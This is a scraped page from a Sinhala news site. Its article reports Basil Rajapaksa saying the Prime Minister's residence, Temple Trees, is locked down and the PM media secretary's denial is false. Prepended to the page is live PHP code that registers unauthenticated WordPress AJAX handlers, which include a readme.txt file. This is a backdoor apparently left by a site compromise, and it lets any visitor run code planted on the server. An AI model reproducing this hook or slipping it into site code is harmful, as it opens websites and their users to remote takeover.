if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අරලියගහ මැදුර ලොක්ඩවුන්.. සේවකයන් නිවසේ සිට වැඩ.. අගමැති මාධ්‍ය ලේකම්ගේ නිවේදනය අසත්‍යයි..- බැසිල් - mediahumanrights.lk
mediahumanrights.lk
News Political

අරලියගහ මැදුර ලොක්ඩවුන්.. සේවකයන් නිවසේ සිට වැඩ.. අගමැති මාධ්‍ය ලේකම්ගේ නිවේදනය අසත්‍යයි..- බැසිල්

අගමැති නිල නිවස වන අරලියගහ මන්දිරය මේ වන විට හුදෙකලා කිරීමකට ලක්කර ඇති බවත් එහි සේවකයන් නිවසේ සිට රාජකාරී කිරීමට යොදවා ඇති බවත් ඒ තුළ රාජකාරි කටයුතු සිදු නොවන බවත් හිටපු අමාත්‍ය බැසිල් රාජපක්ෂ මහතා සඳහන් කරයි.

සන්ඩේ ටයිම්ස් පුවත්පතට අදහස් පළකරමින් ඔහු පෙන්වා දී ඇත්තේ අරලියගහ මැදුර ලොක්ඩවුන් කර නැතැයි අග්‍රාමාත්‍ය මාධ්‍ය ලේකම් වරයා විසින් නිකුත් කර ඇති නිවේදනය සත්‍යය නොවන බවයි.

මෙවන් අසත්‍ය ප්‍රකාශ නිසා අගමැතිවරයා පවා හාස්‍යයට ලක්වන බවද පෙන්වා දී ඇති බැසිල් රාජපක්ෂ මහතා කිසිදු කරුණක් සැඟවීමට උවමනා නැති බවත් රොහාන් වැලිවිට මහතා මේ ආකාරයෙන් අසත්‍ය ප්‍රකාශ කිරීමට කිසිදු අයිතියක් නැති බවත් සඳහන් කර ඇත.

තමන්ද අරලියගහ මැඳුරේ කාර්යාලයක කටයුතු කරන බව නිවේදනයේ ඇතත් එවන් කාර්‍යාලයකින් එහි නොමැති බවද පවසන රාජපක්ෂ මහතා තමන් පසුගිය දින කිහිපය පුරාම රැස්වීම් පැවැත්වූයේ වෙනත් ස්ථානවල බවද කියාසිටී.

lankacnews

Related posts

පිල්ලෙයාන් අත්අඩංගුවට ගනී…

Shiran Viraj

ආසියානු කුසලාන විස්සයි විස්ස ක්‍රිකට් තරගාවලිය ලංකාවට දීමට වැඩි කැමැත්ත

Shiran Viraj

අලි සබ්රි අධිකරණ ඇමතිකමෙන් ඉවත් කරන්නැයි විරෝධතා…

Shiran Viraj